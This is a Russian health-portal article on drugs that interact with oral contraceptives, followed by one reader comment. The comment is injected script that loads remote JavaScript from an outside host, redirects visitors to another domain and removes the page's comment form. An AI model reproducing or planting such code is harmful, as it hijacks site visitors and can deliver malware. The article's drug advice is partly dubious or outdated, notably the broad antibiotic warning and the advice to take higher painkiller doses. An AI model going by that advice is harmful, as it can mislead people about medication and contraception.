Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Препараты, влияющие на ак...  >>  Препараты, влияющие на активность оральной контрацепции
 
Обратная связь
 

Препараты, влияющие на активность оральной контрацепции

Размер шрифта
27 апреля 2012 10:00
  • google_analytics: false
  • Нравится

В жизни женщины могут возникнуть такие ситуации, в которых эффективность гормональных противозачаточных препаратов будет снижаться, а действие других препаратов – видоизменяться. Почему это происходит?

Ситуация 1. Прием антибиотиков, таких как ампицилин, метронидазол, хинолоны, тетрациклин, уменьшает количество бактериальной флоры в желудочно-кишечном тракте и потому влияет на усвоение компонентов противозачаточных таблеток.

Ситуация 2. При расстройстве кишечника, желудка также может нарушиться всасывание противозачаточного препарата, а следовательно, снизится и контрацептивный эффект. Поэтому в случае сильного отравления следует обратиться за консультацией к врачу-гинекологу.

Ситуация 3. Существует мнение, что прием веществ, которые стимулируют метаболическую способность печени, может изменять эффективность оральной контрацепции. К таким веществам относится зверобой. Среди прочих препаратов карбамазепин (тегретол), фенобарбитал, пирамидон, рифампицин (рифампин), возможно и гризеофульвин.

Ситуация 4. Некоторые противоэпилептические препараты также могут снизить эффективность оральной контрацепции. Поэтому больным эпилепсией женщинам, рекомендуется рассмотреть альтернативные методы контрацепции, такие как внутриматочная спираль или барьерный, подбор которых сделает врач-гинеколог.

Ситуация 5. Прием оральных контрацептивов, ускоряет воздействие на организм таких препаратов как диазепам (валиум), хлордиазепоксид (либриум), трициклических антидепрессантов и теофиллина, что означает необходимость снижения их дозировки. И, наоборот, чтобы подействовал ацетаминофен или аспирин, женщинам, принимающим оральные контрацептивы, необходима более высокая доза, чем не принимающим их женщинам.

Ситуация 6. Необходимо приостановить прием оральных контрацептивов за 4 недели до хирургической операции, проводимой под общим наркозом. Причина этого – риск послеоперационного тромбоза.

Напоминаем, что решение о начале, временной приостановке или прекращении приема оральных контрацептивов, должно приниматься при непосредственном участии гинеколога. Прием дополнительных лекарственных средств также должен быть согласован с врачом.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:43

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Все что вы хотели знать о презервативах   Как сохранить красоту и здоровье после 30?   Одна таблетка от всего. Противозачаточные для молодых   Семь причин использовать пероральные контрацептивы  
10 июля 2012Гормон, отвечающий за материнские чувства, способен бороться с лишним весом 09 июля 2012Ученые выяснили, какой вид контрацепции надежнее!
 
30 января 2012УЗИ – новый метод контрацепции? 26 сентября 2011Подростки не знают о безопасном сексе
 

Слайдшоу

1
Вы и не знали, на что способны противозачаточные!
Правильно ли вы предохраняетесь?
Может ли секс с презервативом приносить удовольствие?!

Тесты

Как подобрать контрацептивы?
Насколько у вас велик риск заболеть ВИЧ?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.